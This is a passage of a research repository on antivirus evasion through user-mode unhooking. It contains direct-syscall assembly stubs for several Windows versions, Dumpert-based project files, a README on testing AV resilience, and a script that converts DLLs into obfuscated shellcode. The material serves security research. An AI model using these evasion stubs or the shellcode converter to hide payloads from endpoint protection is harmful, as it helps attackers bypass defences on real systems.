ZwClose80 endp 149 | 150 | ZwWriteVirtualMemory80 proc 151 | mov r10, rcx 152 | mov eax, 38h 153 | syscall 154 | ret 155 | ZwWriteVirtualMemory80 endp 156 | 157 | ZwProtectVirtualMemory80 proc 158 | mov r10, rcx 159 | mov eax, 4Eh 160 | syscall 161 | ret 162 | ZwProtectVirtualMemory80 endp 163 | 164 | ZwQuerySystemInformation80 proc 165 | mov r10, rcx 166 | mov eax, 34h 167 | syscall 168 | ret 169 | ZwQuerySystemInformation80 endp 170 | 171 | NtAllocateVirtualMemory80 proc 172 | mov r10, rcx 173 | mov eax, 16h 174 | syscall 175 | ret 176 | NtAllocateVirtualMemory80 endp 177 | 178 | NtFreeVirtualMemory80 proc 179 | mov r10, rcx 180 | mov eax, 1Ch 181 | syscall 182 | ret 183 | NtFreeVirtualMemory80 endp 184 | 185 | NtCreateFile80 proc 186 | mov r10, rcx 187 | mov eax, 53h 188 | syscall 189 | ret 190 | NtCreateFile80 endp 191 | 192 | ; Windows 8.1 / Server 2012 R2 specific syscalls 193 | 194 | ZwOpenProcess81 proc 195 | mov r10, rcx 196 | mov eax, 25h 197 | syscall 198 | ret 199 | ZwOpenProcess81 endp 200 | 201 | ZwClose81 proc 202 | mov r10, rcx 203 | mov eax, 0Eh 204 | syscall 205 | ret 206 | ZwClose81 endp 207 | 208 | ZwWriteVirtualMemory81 proc 209 | mov r10, rcx 210 | mov eax, 39h 211 | syscall 212 | ret 213 | ZwWriteVirtualMemory81 endp 214 | 215 | ZwProtectVirtualMemory81 proc 216 | mov r10, rcx 217 | mov eax, 4Fh 218 | syscall 219 | ret 220 | ZwProtectVirtualMemory81 endp 221 | 222 | ZwQuerySystemInformation81 proc 223 | mov r10, rcx 224 | mov eax, 35h 225 | syscall 226 | ret 227 | ZwQuerySystemInformation81 endp 228 | 229 | NtAllocateVirtualMemory81 proc 230 | mov r10, rcx 231 | mov eax, 17h 232 | syscall 233 | ret 234 | NtAllocateVirtualMemory81 endp 235 | 236 | NtFreeVirtualMemory81 proc 237 | mov r10, rcx 238 | mov eax, 1Dh 239 | syscall 240 | ret 241 | NtFreeVirtualMemory81 endp 242 | 243 | NtCreateFile81 proc 244 | mov r10, rcx 245 | mov eax, 54h 246 | syscall 247 | ret 248 | NtCreateFile81 endp 249 | 250 | ; Windows 10 / Server 2016 specific syscalls 
251 | 252 | ZwOpenProcess10 proc 253 | mov r10, rcx 254 | mov eax, 26h 255 | syscall 256 | ret 257 | ZwOpenProcess10 endp 258 | 259 | ZwClose10 proc 260 | mov r10, rcx 261 | mov eax, 0Fh 262 | syscall 263 | ret 264 | ZwClose10 endp 265 | 266 | ZwWriteVirtualMemory10 proc 267 | mov r10, rcx 268 | mov eax, 3Ah 269 | syscall 270 | ret 271 | ZwWriteVirtualMemory10 endp 272 | 273 | ZwProtectVirtualMemory10 proc 274 | mov r10, rcx 275 | mov eax, 50h 276 | syscall 277 | ret 278 | ZwProtectVirtualMemory10 endp 279 | 280 | ZwQuerySystemInformation10 proc 281 | mov r10, rcx 282 | mov eax, 36h 283 | syscall 284 | ret 285 | ZwQuerySystemInformation10 endp 286 | 287 | NtAllocateVirtualMemory10 proc 288 | mov r10, rcx 289 | mov eax, 18h 290 | syscall 291 | ret 292 | NtAllocateVirtualMemory10 endp 293 | 294 | NtFreeVirtualMemory10 proc 295 | mov r10, rcx 296 | mov eax, 1Eh 297 | syscall 298 | ret 299 | NtFreeVirtualMemory10 endp 300 | 301 | NtCreateFile10 proc 302 | mov r10, rcx 303 | mov eax, 55h 304 | syscall 305 | ret 306 | NtCreateFile10 endp 307 | 308 | end 309 | -------------------------------------------------------------------------------- /CustomCode/PerunsFart/sysc_sw2.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | 4 | end -------------------------------------------------------------------------------- /DumpertResearch/Outflank-Dumpert.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert", "Outflank-Dumpert\Outflank-Dumpert.vcxproj", "{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = 
Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 17 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64 18 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32 19 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32 20 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64 21 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32 23 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /DumpertResearch/Outflank-Dumpert/Outflank-Dumpert.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4} 23 | OutflankDumpert 24 | 10.0 25 | Outflank-Dumpert 26 | 27 | 28 | 29 | Application 30 | true 31 | v142 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v142 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v142 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v142 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | Console 89 | 90 | 91 | 92 | 93 | Level3 94 | MaxSpeed 95 | true 96 | true 97 | true 98 | MultiThreaded 99 | 
100 | 101 | true 102 | true 103 | 104 | 105 | 106 | 107 | Level3 108 | MaxSpeed 109 | true 110 | true 111 | true 112 | MultiThreaded 113 | 114 | 115 | true 116 | true 117 | false 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | -------------------------------------------------------------------------------- /DumpertResearch/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Source Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /DumpertResearch/Outflank-Dumpert/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov 
r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | 
ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | -------------------------------------------------------------------------------- /HookCorruptor/Outflank-Dumpert.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 
14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert", "Outflank-Dumpert\Outflank-Dumpert.vcxproj", "{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 17 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64 18 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32 19 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32 20 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64 21 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32 23 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /HookCorruptor/Outflank-Dumpert/Outflank-Dumpert.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4} 23 | OutflankDumpert 24 | 10.0 25 | Outflank-Dumpert 26 | 27 | 28 | 29 | Application 30 | true 31 | v142 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v142 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v142 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v142 51 
| true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | Console 89 | 90 | 91 | 92 | 93 | Level3 94 | MaxSpeed 95 | true 96 | true 97 | true 98 | MultiThreaded 99 | 100 | 101 | true 102 | true 103 | 104 | 105 | 106 | 107 | Level3 108 | MaxSpeed 109 | true 110 | true 111 | true 112 | MultiThreaded 113 | 114 | 115 | true 116 | true 117 | false 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | -------------------------------------------------------------------------------- /HookCorruptor/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Source Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /HookCorruptor/Outflank-Dumpert/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | 
ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov 
eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | 
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # User Mode Unhooking test script 2 | This project is created for research into antivirus evasion by unhooking. The paper containing additional information and references can be found here: https://rp.os3.nl/2020-2021/p68/report.pdf. The repo contains scripts and source code for running unhooking techniques on different payloads to test the resilience of an antivirus product to such unhooking techniques. 3 | 4 | Two of the five implemented techniques are novell techniques that can be used if an antivirus product hooks different functions on different processes of the same user: 5 | - Interprocess Function Copying 6 | - Interprocess Section Copying 7 | 8 | ## Usage 9 | 10 | ### Preparation 11 | - The output filename at the top of the RunAllExperiments.ps1 PowerShell script can be adjusted to specify the right output filename. 12 | - Make sure the Visual Studio projects for unhooking techniques are compiled. 13 | - Compile different payloads for every experiment and collect the files needed for the experiments by running exportFiles.bat. 14 | - Create a baseline file containing unhooked .dll info by running "HookFinder -1" on a system without antivirus. 15 | - Copy the files to the target machine. 16 | 17 | ### Running The Experiments 18 | - Make sure you are logged in with user permissions (or use "runas /trustlevel:0x20000"). 19 | - Run powershell ./RunAllExperiments.ps1 20 | - The hooks in memory will be written to txt files and the status of return codes of payloads and unhooking applications will be displayed in the output of the script. 21 | - Because every antivirus product is different, a manual check is required to see which antivirus alerts are generated. 22 | 23 | ### Troubleshooting 24 | - The payloads created trigger specific functions. 
If other functions are hooked, you have to manually adjust Prologue Restoring. 25 | - Required hardcoded bytes of Prologue Restoring depend on the targeted Windows version. 26 | - Perun's Fart is limited to unhooking ntdll.dll. 27 | 28 | ## Directory Content 29 | - "CustomCode" contains code for payloads and unhooking techniques that were created for this research. 30 | - "DumpertResearch" and "ShellycoatResearch" contain adjusted versions of Dumpert and ShellyCoat respectively. Both unhooking techniques target an other process. 31 | - "ExperimentScript" contains the PowerShell script that runs different techniques on different payloads. 32 | - "ApplicationsToCheckForHooks" contain Visual Studio boilerplate code for applications that can be run on antivirus software to see if these are getting hooked. 33 | - "HookCorruptor" contains code, based on Dumpert, for checking if hooks are triggered (see Troubleshooting that we mentioned earlier). 34 | 35 | ## Acknowledgements 36 | This research is based on some of the valuable tools, blogs and proof-of-concepts on unhooking that are published by members of the security community. 37 | The implemented unhooking techniques, e.g., were, where possible, created by using and adjusting parts of existing code from projects like Shellycoat and Dumpert. 
References to these projects can be found in the paper mentioned above.
dest='user_data', help='Data to pass to the target function', default='dave') 14 | parser.add_argument('-c', '--clear-header', dest='clear_header', action='store_true', help='Clear the PE header on load') 15 | parser.add_argument('-i', '--obfuscate-imports', dest='obfuscate_imports', action='store_true', help='Randomize import dependency load order', default=False) 16 | parser.add_argument('-d', '--import-delay', dest='import_delay', help='Number of seconds to pause between loading imports', type=int, default=0) 17 | arguments = parser.parse_args() 18 | 19 | input_dll = arguments.input_dll 20 | output_bin = input_dll.replace('.dll', '.bin') 21 | 22 | print('Creating Shellcode: {}'.format(output_bin)) 23 | dll = open(arguments.input_dll, 'rb').read() 24 | 25 | flags = 0 26 | 27 | if arguments.clear_header: 28 | flags |= 0x1 29 | 30 | if arguments.obfuscate_imports: 31 | flags = flags | 0x4 | arguments.import_delay << 16 32 | 33 | converted_dll = ConvertToShellcode(dll, HashFunctionName(arguments.function_name), arguments.user_data.encode(), flags) 34 | 35 | with open(output_bin, 'wb') as f: 36 | f.write(converted_dll) 37 | 38 | if __name__ == '__main__': 39 | main() 40 | -------------------------------------------------------------------------------- /ShellycoatResearch/Python/__pycache__/ShellcodeRDI.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Python/__pycache__/ShellcodeRDI.cpython-39.pyc -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/bypass-techniques.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/bypass-techniques.png 
-------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/capa.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/capa.PNG -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/hooking.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/hooking.gif -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/reading-ntdll.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/reading-ntdll.png -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/section-remapping.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/section-remapping.png -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/shellycoat-internal.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/shellycoat-internal.gif -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/unhooking.gif: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/unhooking.gif -------------------------------------------------------------------------------- /ShellycoatResearch/Screenshots/why-syscall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/why-syscall.png -------------------------------------------------------------------------------- /ShellycoatResearch/Src/Structs.h: --------------------------------------------------------------------------------
#pragma once

#include

// Macros
// ------------------------------------------------------------------------
// Hand-written subset of the ntstatus.h / winternl.h definitions needed by
// the direct-syscall code. Only the values this project actually uses are
// declared here, so nothing from the public NT headers is pulled in.

#define STATUS_SUCCESS 0

